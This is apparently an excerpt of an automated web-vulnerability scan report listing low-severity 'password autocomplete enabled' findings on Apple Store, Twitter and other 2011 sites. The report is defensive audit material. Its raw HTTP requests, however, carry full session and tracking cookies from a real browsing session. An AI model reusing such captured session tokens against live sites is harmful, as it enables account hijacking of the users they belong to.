Set-Cookie: bb_lastactivity=0; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: dyk=1; expires=Thu, 10-Feb-2011 20:32:20 GMT; path=/; domain=.digitalpoint.com
Cache-Control: private
Pragma: private
Content-Length: 24249
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<form id="navbar_loginform" action="login.php?s=60ff27681771626f1d2c139114155359&amp;do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
<input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

14.12. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Apple/WebObjects/OrderStatus.woa?sf=us HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:49:29 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:15:33 GMT
pragma: no-cache
connection: close
content-length: 13807
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
</script>

<form method="post" name="appleConnectForm" action="/Apple/WebObjects/OrderStatus.woa/5144002/wo/7MdrLzZ0tWVi3M5yCkTnx0/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0">
   
   
                   <table>
...[SNIP]...
</h3>
                   <input size="20" maxlength="32" type="password" name="theAccountPW" />
                   <input border="0" width="0" height="0" type="image" name="1.Continue" src="/AppleConnect/US-EN/spacer.gif" />
...[SNIP]...

14.13. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:49:28 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:31:23 GMT
pragma: no-cache
connection: close
content-length: 13819
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
</script>

<form method="post" name="appleConnectForm" action="/Apple/WebObjects/OrderStatus.woa/510124007/wo/1xn0ta7jxj4qIER2shlrMw/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0">
   
   
                   <table>
...[SNIP]...
</h3>
                   <input size="20" maxlength="32" type="password" name="theAccountPW" />
                   <input border="0" width="0" height="0" type="image" name="1.Continue" src="/AppleConnect/US-EN/spacer.gif" />
...[SNIP]...

14.14. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Apple/WebObjects/OrderStatus.woa?sf=us HTTP/1.1
Host: store.apple.com
Connection: keep-alive
Referer: http://store.apple.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20accessories%20(us); asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; s_cc=true; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:57:12 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:25:11 GMT
pragma: no-cache
nncoection: close
cteonnt-length: 13807
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin
Content-Length: 13807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
</script>

<form method="post" name="appleConnectForm" action="/Apple/WebObjects/OrderStatus.woa/5164009/wo/mtj8sjPkAbsOztnoTZcI50/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0">
   
   
                   <table>
...[SNIP]...
</h3>
                   <input size="20" maxlength="32" type="password" name="theAccountPW" />
                   <input border="0" width="0" height="0" type="image" name="1.Continue" src="/AppleConnect/US-EN/spacer.gif" />
...[SNIP]...

14.15. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:10:45 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:28:28 GMT
pragma: no-cache
set-cookie: wosid=O7XguopRkA6tCQjGACmrgg; version="1"; expires=Mon, 03-Jan-2011 18:10:45 GMT; path=/1-800-MY-APPLE/WebObjects/OrderStatus.woa
set-cookie: woinst=-1; version="1"; expires=Mon, 03-Jan-2011 18:10:45 GMT; path=/1-800-MY-APPLE/WebObjects/OrderStatus.woa
connection: close
content-length: 13819
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
</script>

<form method="post" name="appleConnectForm" action="/Apple/WebObjects/OrderStatus.woa/510074003/wo/O7XguopRkA6tCQjGACmrgg/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0">
   
   
                   <table>
...[SNIP]...
</h3>
                   <input size="20" maxlength="32" type="password" name="theAccountPW" />
                   <input border="0" width="0" height="0" type="image" name="1.Continue" src="/AppleConnect/US-EN/spacer.gif" />
...[SNIP]...

14.16. https://store.apple.com/Apple/WebObjects/OrderStatus.woa  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Apple/WebObjects/OrderStatus.woa?sf=us HTTP/1.1
Host: store.apple.com
Connection: keep-alive
Referer: http://store.apple.com/us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20accessories%20(us); asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; s_cc=true; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 17:56:42 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:15:40 GMT
pragma: no-cache
nncoection: close
cteonnt-length: 13807
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin
Content-Length: 13807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
</script>

<form method="post" name="appleConnectForm" action="/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0">
   
   
                   <table>
...[SNIP]...
</h3>
                   <input size="20" maxlength="32" type="password" name="theAccountPW" />
                   <input border="0" width="0" height="0" type="image" name="1.Continue" src="/AppleConnect/US-EN/spacer.gif" />
...[SNIP]...

14.17. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13.25.1 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:10:47 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Sun, 30-Jan-2011 06:15:40 GMT
pragma: no-cache
connection: close
content-length: 14032
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-frame-options: sameorigin


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Apple Order Status</title>

<meta name="robots
...[SNIP]...
</script>

<form method="post" name="appleConnectForm" action="/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/4.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0">
   
   
                   <table>
...[SNIP]...
</h3>
                   <input size="20" maxlength="32" type="password" name="theAccountPW" />
                   <input border="0" width="0" height="0" type="image" name="1.Continue" src="/AppleConnect/US-EN/spacer.gif" />
...[SNIP]...

14.18. http://twitter.com/supermedia  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /supermedia

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /supermedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:19:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296760753-13380-14514
ETag: "980457e03ec8c8ddfb67fd40ecd97bea"
Last-Modified: Thu, 03 Feb 2011 19:19:13 GMT
X-Runtime: 0.01072
Content-Type: text/html; charset=utf-8
Content-Length: 50851
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296760753269662; path=/; expires=Thu, 10-Feb-11 19:19:13 GMT; domain=.twitter.com
Set-Cookie: guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH%252FM9uwtAToHaWQiJTRmZjcyZDZjOTYwYzFj%250ANDkxYTkzZDhhNmVhN2Q2OGNhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--100f876db5da30de78a91b22d9b5e99bb4d21a14; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="1186dd286e615868d0ce5610f308c5c6526772cd" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

14.19. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
